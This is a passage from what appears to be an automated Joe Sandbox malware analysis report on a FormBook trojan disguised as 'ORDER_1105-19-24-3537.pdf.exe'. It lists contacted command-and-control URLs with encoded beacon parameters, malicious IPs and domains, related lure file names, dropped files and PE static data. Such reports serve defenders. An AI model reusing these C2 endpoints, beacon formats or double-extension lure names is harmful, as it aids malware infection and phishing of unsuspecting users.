http://www.bigbrown999.siteReferer:	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.bdkasinoxox.xyz/rn94/	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.hinet.tech	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.laske.xyz	explorer.exe, 00000006.00000003.3097725928.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4550936989.000000000CA10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3875398799.000000000CA2D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3098571353.000000000CA39000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000006.00000002.4540391524.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2104403018.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.longmaosol.xyz/rn94/	explorer.exe, 00000006.00000003.3876197214.000000000CA39000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.53.179.90	www.abandoned-houses-39863.bond	Germany	61969	TEAMINTERNET-ASDE	true
154.21.81.142	www.qwechaotk.top	United States	174	COGENT-174US	true
23.227.38.74	shops.myshopify.com	Canada	13335	CLOUDFLARENETUS	true
162.0.209.7	bdkasinoxox.xyz	Canada	35893	ACPCA	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1515805
Start date and time:	2024-09-23 14:37:40 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 35s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	12
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	ORDER_1105-19-24-3537.pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@11/6@11/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 121 Number of non-executed functions: 318
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
08:38:35	API Interceptor	1x Sleep call for process: ORDER_1105-19-24-3537.pdf.exe modified
08:38:37	API Interceptor	13x Sleep call for process: powershell.exe modified
08:38:41	API Interceptor	6780728x Sleep call for process: explorer.exe modified
08:39:21	API Interceptor	6238788x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.53.179.90	t5ueYgHiHnIdeNe.exe	Get hash	malicious	FormBook	Browse	www.spanish-classes-76893.bond/he2a/?2dlp=oPYXvJD&sVj8kD=QCHeH8T8n9yMImkBNFFO5RK6/H+Ofub+B2pJGfFnyrTaGY1Ix00CIF13ygR+W9E0i6N7
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.spanish-classes-76893.bond/he2a/?5jE=QCHeH8SInd38VW51R1FO5RK6/H+Ofub+B2pJGfFnyrTaGY1Ix00CIF13yjxEGskM4ds8&ZN9Ls=9rCTo2P0wPzDj0p
	Akb38lKYd6rDV8l.exe	Get hash	malicious	FormBook	Browse	www.real-estate-96841.bond/dy13/?uRDX=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0&OjH8a=9r44lZrP
	mQY9ka5sW6hv2Ri.exe	Get hash	malicious	FormBook	Browse	www.real-estate-96841.bond/dy13/?Cj9LK=8pm41D0p&0N=QEHoM+aYI3hCf+czBdOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAifn9DzIiC0
	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	www.abandoned-houses-39863.bond/rn94/?SXm49b=+TOTySD/xKzI1m9iyt2YV9oe7irabqlb0FG3M+MtGGXp3TOb0Tp0F4yVfcCxStplS5t4N3XNSA==&CP60e=Nj5TAPxx-d38Ipw0
	TT-SWIFT-Schindler.exe	Get hash	malicious	FormBook	Browse	www.flower-us-delivery.bond/m10e/
	cca9sXT33VsAEdu.exe	Get hash	malicious	FormBook	Browse	www.real-estate-96841.bond/dy13/?ITots6U=QEHoM+bsIXkyCOBHdtOSz9RRIKYxAFZVZwkeDGKMWY6YfTbawsJCAKRBbAi68MzzIie5&DHRL9=9rjXGh4
	100560251 jpg.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.mid-size-suv-87652.com/kmge/
	SecuriteInfo.com.Trojan.DownLoader45.65183.28425.18884.exe	Get hash	malicious	FormBook, DBatLoader	Browse	www.mid-size-suv-87652.com/kmge/
	emir_PDF.exe	Get hash	malicious	DBatLoader, FormBook	Browse	www.dental-implants-52958.com/ges9/?C4=dcmsN+euVkSaJmWI0es1ah40w3uZLJeCAwbD+x+ksTCqkmjtc8ueAQxOeNoJ/HKOJwS3&E6=1buXqVShNpY
154.21.81.142	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	www.qwechaotk.top/rn94/?ndsLnTq=Fx60rCVvY/PfTPS+x0Yy+mO10iBB7HzlvlxbYnAbTZ/GodXDJ0QLvzTZw5vD+nHNcFZ9&pPO=DFQxUrcpRxVH
23.227.38.74	Specification and Quantity Pdf.exe	Get hash	malicious	FormBook	Browse	www.tuktukwines.com/n7ak/
	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?EhCdVX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YsxR0Bd308&Ir=X2JLBxZp
	0nazQxrt5MZ5BRK.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?RlXX=K85VkNX2gzFTaVwdkebjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP480K2QI5QWVnx/JXOA==&DvU8k=hbjlAVS0fTh
	ojtBIU0jhM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	www.faredeal.online/v15n/?qN9=EFNxULM0Cf1t&jL0=ukmuyFp122ER9SkUd0Oy5jDnVATzXW6kTvhnBjXlJsYO+LS6EgGMB9Jvm3Bl806Q2DBF
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	www.sdcollections.shop/he2a/?5jE=K85VkNWCgTAjHltp4ubjgBMLzwQ20gXAGOHRXkR02nlgeTA1vgIL3XNP4/YJqgEBd3ox&ZN9Ls=9rCTo2P0wPzDj0p
	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	www.vanguardcoffee.shop/rn94/?D8v=8pGtVJo0up&Rfg=24QTUhZRstyZshAJnYZI2UxfXBs/uV+QALIDsDsnR/VZc8/4uu3qctyboRQgkU7gUCap
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	www.melliccine.com/pt46/?BXIxB=FNzjLCNxKg4LnG2n+y3Cc1p/SDbqNFm/9WFnTrWlxnnrh9nJEYJm3P779kB2uMZreiO6&-ZYp=fvRlPd_pa8MLs2
	MAPAL AMENDED PI SO23000680.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	Payment Advice - Ref[GLV407423235].scr.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/
	New Inquiry GLES Inquiry G-6463_pdf.scr.exe	Get hash	malicious	FormBook	Browse	www.valerieomage.com/hsmv/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.hinet.tech	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
www.hinet.tech	DHL_TOC2_2407081728458457.pdf.exe	Get hash	malicious	FormBook	Browse	3.64.163.50
www.qwechaotk.top	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	154.21.81.142
www.qwechaotk.top	NUEVO ORDEN01_202407238454854.pdf.exe	Get hash	malicious	FormBook	Browse	154.21.81.142
www.abandoned-houses-39863.bond	DHL ARRIVAL DOCUMENTS.pdf.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
shops.myshopify.com	Specification and Quantity Pdf.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	r8ykXfy52F9CXd5d.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	t5ueYgHiHnIdeNe.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	http://chiao1129.github.io/login	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	http://vineethkinik.github.io/Netflix-wesite-frontend	Get hash	malicious	HTMLPhisher	Browse	23.227.38.74
	0nazQxrt5MZ5BRK.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	ojtBIU0jhM.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	23.227.38.74
	PDPUOIE76867 PDF.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	LYONSOFT, COOP.V. - Env#U00edo orden 240187 fecha 02-09-2024.exe	Get hash	malicious	FormBook	Browse	23.227.38.74
	Etisalat Summary Bill for the Month of August.exe	Get hash	malicious	FormBook	Browse	23.227.38.74

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
COGENT-174US	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	38.47.232.196
	http://xb2.aggressiveq9.com/21u/	Get hash	malicious	HTMLPhisher	Browse	143.244.208.184
	q8HkBndUpP.exe	Get hash	malicious	Unknown	Browse	38.175.45.11
	yoYRK88Xg2.exe	Get hash	malicious	Unknown	Browse	38.175.45.20
	jade.arm.elf	Get hash	malicious	Mirai	Browse	206.0.212.64
	jade.ppc.elf	Get hash	malicious	Mirai	Browse	149.40.99.56
	AWB_5771388044 Documenti di spedizione.exe	Get hash	malicious	FormBook	Browse	206.119.82.147
	ES-241-29335_pdf.exe	Get hash	malicious	FormBook	Browse	38.181.21.65
	PO2024033194.exe	Get hash	malicious	FormBook	Browse	154.23.184.240
	PO #86637.exe	Get hash	malicious	FormBook	Browse	154.23.184.240
ACPCA	https://secure.rpcthai.com/	Get hash	malicious	Unknown	Browse	162.55.233.29
	PO #86637.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	New Purchase Order.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	invoice.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	809768765454654.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	is homemade pepper spray legal uk 42639.js	Get hash	malicious	GookitLoader	Browse	162.55.208.83
	r9856_7.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	8097600987765.exe	Get hash	malicious	FormBook	Browse	162.0.213.72
	PO#86637.exe	Get hash	malicious	FormBook	Browse	162.0.213.94
	QOaboeP8al.exe	Get hash	malicious	DarkCloud	Browse	162.55.60.2
TEAMINTERNET-ASDE	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	185.53.177.31
	ActSet.ps1	Get hash	malicious	Fredy Stealer	Browse	185.53.177.31
	SecuriteInfo.com.Win32.Sector.30.19697.26848.exe	Get hash	malicious	Sality	Browse	185.53.178.50
	t5ueYgHiHnIdeNe.exe	Get hash	malicious	FormBook	Browse	185.53.179.90
	IDMan.exe	Get hash	malicious	Fredy Stealer	Browse	185.53.177.31
	IDMan.exe	Get hash	malicious	Fredy Stealer	Browse	185.53.177.31
	firmware.armv4l.elf	Get hash	malicious	Unknown	Browse	185.53.178.51
	firmware.armv5l.elf	Get hash	malicious	Unknown	Browse	185.53.178.51
	firmware.armv7l.elf	Get hash	malicious	Unknown	Browse	185.53.177.50
	firmware.i586.elf	Get hash	malicious	Unknown	Browse	185.53.177.50
CLOUDFLARENETUS	Purchase Order_ AEPL-2324-1126.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
	PO-3500036071.exe	Get hash	malicious	AgentTesla	Browse	172.67.74.152
	Payment Receipt for 30% Advance PI.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Order_Specifications.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ref_5010_103.exe	Get hash	malicious	AgentTesla	Browse	104.26.12.205
	Ship_Doc_18505.exe	Get hash	malicious	AgentTesla	Browse	104.26.13.205
	https://autoblazquez.com	Get hash	malicious	Unknown	Browse	104.22.71.197
	https://tinyurl.com/5xa2ubd7	Get hash	malicious	Unknown	Browse	104.17.112.233
	https://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/human-verify-system.html	Get hash	malicious	HTMLPhisher	Browse	104.16.124.96
	Review-Complete agreement for Cardfactory IDDisburement_2a75f1f31445805212fc773a74f9027b51a85ebe.eml	Get hash	malicious	Unknown	Browse	188.114.96.3

Process:	C:\Users\user\Desktop\ORDER_1105-19-24-3537.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379677338874509
Encrypted:	false
SSDEEP:	48:tWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//YPUyus:tLHxvIIwLgZ2KRHWLOugQs
MD5:	6FFAE47E170B8C4BF11123D7E6AF2565
SHA1:	CCA653FCEF2BE1689FB17674EBD76D1C945044EF
SHA-256:	55F237E5A06113F744AA80B6C1321E8AFF20C3389C533F0ADF34593934CEAF9F
SHA-512:	C1B37A35B61634C2FDCAB66F93C6326630E55337EB709E0AF31EE5557BF17B0F03EE00BD96B2D3018A9D1E16FADCF567A9F2C88951D385EBA7BB1E9D6497B4AE
Malicious:	false
Reputation:	low
Preview:	@...e.................................,..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0hgicnxu.ib1.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_euyhdxbb.nec.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mluqbrvl.cef.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yn1wx24b.cff.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.754029502719996
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	ORDER_1105-19-24-3537.pdf.exe
File size:	611'840 bytes
MD5:	a2082543a1c1028dd0a613a6a2af4d21
SHA1:	b6fff58598fad2366a05c18d2d3ccf00f7403391
SHA256:	ee118f8e57acfa0e476638a011ed8d6664d1499e1b326180e21e6f9834ea93e0
SHA512:	0dad8d8910dfe0d567477c00a1ded696f5ad582fa671731480ae0d8662994a44f61af23373d3c90b44979fb4a6c3fc47ac5f0123442b9af48283ba4fe7a03370
SSDEEP:	12288:u8EaxDW9G3pwB8uVR8WMQSiWLog+ggWgadajFCMQYcnNdhyq71724Lt:FEaxD31YOW5CzWUTN6E1R
TLSH:	BED4E1B75363BDE3D3370EF58D40B5815E20083F9E3C95A8ACDB52C811E35A46AB8D66
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#................0..L.........."j... ........@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x496a22
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x8C1323AF [Mon Jun 20 19:42:39 2044 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x969cf	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x98000	0x5cc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x95250	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x94a28	0x94c00	217ac6c4035bfeeb8529eaec342ec680	False	0.8755563944327731	data	7.758118048517549	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x98000	0x5cc	0x600	43754a88e7d6074ac22519027cadfa7d	False	0.4283854166666667	data	4.1394579308464685	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9a000	0xc	0x200	50cb78b21433e2af5bfc8859aa535b83	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x98090	0x33c	data			0.42995169082125606
RT_MANIFEST	0x983dc	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
